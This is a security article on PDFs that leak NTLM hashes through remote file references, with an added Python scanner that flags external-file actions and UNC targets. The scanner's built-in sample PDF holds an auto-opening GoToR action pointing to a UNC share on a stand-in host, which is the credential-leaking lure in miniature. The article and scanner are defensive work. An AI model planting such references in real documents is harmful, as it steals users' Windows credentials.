According to Check Point researchers, there is a new attack vector to be aware of. Rather than exploiting vulnerabilities in Microsoft Word files or in Outlook’s handling of RTF files, attackers take advantage of a legitimate PDF feature that allows remote documents and files to be referenced from inside a PDF. The attacker uses this feature to plant a reference to a remote resource in a PDF; when the file is opened, the victim’s machine resolves that reference and automatically leaks credentials in the form of NTLM hashes.
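The following triage script is an added example and is not Check Point’s, Adobe’s or Microsoft’s code. It walks the raw objects of a PDF, finds action dictionaries whose type can pull in an external file (GoToR, GoToE, Launch, ImportData, SubmitForm and URI actions), decodes each file target and labels it. A target on a UNC path is the case the article describes: the viewer hands the path to Windows, which opens it over SMB and answers the remote server’s NTLM challenge before any document is shown. The embedded sample PDF, the `example.invalid` host name and the function names are constructed for this example.

```python
"""Triage scanner for PDF actions that reference external files.

Added example: reports every action whose target lives outside the
document, and flags UNC/SMB targets, which make Windows authenticate
with NTLM as soon as the path is resolved.
"""
import re
from dataclasses import dataclass

# Action types whose target may live outside the document (PDF 32000-1, 12.6.4).
REMOTE_ACTIONS = (b"GoToR", b"GoToE", b"Launch", b"ImportData", b"SubmitForm", b"URI")

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/(" + b"|".join(REMOTE_ACTIONS) + rb")\b")
LITERAL_RE = re.compile(rb"/(?:F|UF|URI)\s*\(((?:\\.|[^\\)])*)\)", re.S)   # (literal string)
HEX_RE = re.compile(rb"/(?:F|UF|URI)\s*<([0-9A-Fa-f\s]*)>")                # <hex string>
OPEN_ACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}


def unescape_literal(raw: bytes) -> str:
    """Decode the body of a PDF literal string (PDF 32000-1, 7.3.4.2)."""
    out, i = bytearray(), 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c != b"\\":
            out += c
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        if nxt in _ESCAPES:
            out += _ESCAPES[nxt]
            i += 2
        elif nxt and nxt in b"01234567":              # \ddd octal escape
            m = re.match(rb"[0-7]{1,3}", raw[i + 1:i + 4])
            out.append(int(m.group(), 8) & 0xFF)
            i += 1 + len(m.group())
        else:                                         # line continuation or stray backslash
            out += b"" if nxt in (b"\n", b"\r") else nxt
            i += 2
    return out.decode("latin-1")


def classify(target: str) -> str:
    """Label where a target resolves; UNC/SMB paths trigger NTLM authentication."""
    low = target.strip().lower()
    if low.startswith(("\\\\", "//")) or (low.startswith("file://") and not low.startswith("file:///")):
        return "remote-smb"
    if low.startswith(("http://", "https://", "ftp://")):
        return "remote-url"
    return "local"


@dataclass
class Finding:
    obj_id: int
    action: str
    target: str
    kind: str
    auto_open: bool   # reached from /OpenAction, so it fires on open without a click


def scan_pdf(data: bytes) -> list[Finding]:
    """Return one Finding per external-file target found in an action dictionary."""
    auto_objs = {int(m.group(1)) for m in OPEN_ACTION_RE.finditer(data)}
    findings = []
    for m in OBJ_RE.finditer(data):
        obj_id, body = int(m.group(1)), m.group(2)
        act = ACTION_RE.search(body)
        if act is None:
            continue
        auto = obj_id in auto_objs or b"/OpenAction" in body
        targets = [unescape_literal(s) for s in LITERAL_RE.findall(body)]
        for h in HEX_RE.findall(body):
            h = re.sub(rb"\s", b"", h)
            if len(h) % 2:
                h += b"0"                             # spec: odd final digit is padded with 0
            targets.append(bytes.fromhex(h.decode()).decode("latin-1"))
        for t in targets:
            findings.append(Finding(obj_id, act.group(1).decode(), t, classify(t), auto))
    return findings


def credential_leak_risks(data: bytes) -> list[Finding]:
    """Findings whose target alone makes Windows send NTLM credentials."""
    return [f for f in scan_pdf(data) if f.kind == "remote-smb"]


# Constructed sample, not a real document: one auto-firing UNC reference, one
# embedded-file reference and one ordinary web link.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Type /Action /S /GoToR /F (\\\\example.invalid\\share\\lure.pdf) /D [0 /Fit] >>
endobj
4 0 obj
<< /Type /Action /S /GoToE /F << /Type /Filespec /F (attachment.pdf) >> /D [0 /Fit] >>
endobj
5 0 obj
<< /Type /Action /S /URI /URI (https://example.invalid/report.pdf) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        flag = "AUTO-OPEN " if f.auto_open else ""
        print(f"obj {f.obj_id}: {flag}{f.action} -> {f.target!r} [{f.kind}]")
```

The scan works on the raw file, so it is a first-pass triage tool: a PDF whose objects are packed into compressed object streams, or whose strings are split across indirect objects, needs a full parser (for example the usual PDF analysis tooling) to expand before this check means anything. The `auto_open` flag is the detail that matters most for this attack, since a reference reached through `/OpenAction` needs no user interaction beyond opening the document.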
As reported by SecurityWeek, Adobe will not be releasing a fix for this behavior. The company is instead relying on updates to Windows 10 and Windows Server 2016. With the new feature those updates introduce, a client can reject NTLM authentication when the resource requesting it has not been classified as ‘internal’ by the Windows Firewall (see Microsoft security advisory ADV170014).
The advisory does not cover older versions of Microsoft operating systems, and the new behavior is not on by default: users (or their IT organization) have to take explicit steps to configure it.
PDF exploits are not new; they have been with us for a long time. A 2010 report put malicious PDFs at 80% of all exploits seen in 2009.
As ever, the advice remains the same:
- Be aware of what you are opening and where it comes from (that goes for clickbait too).
- Make sure your antivirus software is up to date and set to scan ‘on access’.
- Use a web safety tool that warns you about suspicious links, or sites with a bad reputation, before you open them.
- If in doubt, don’t!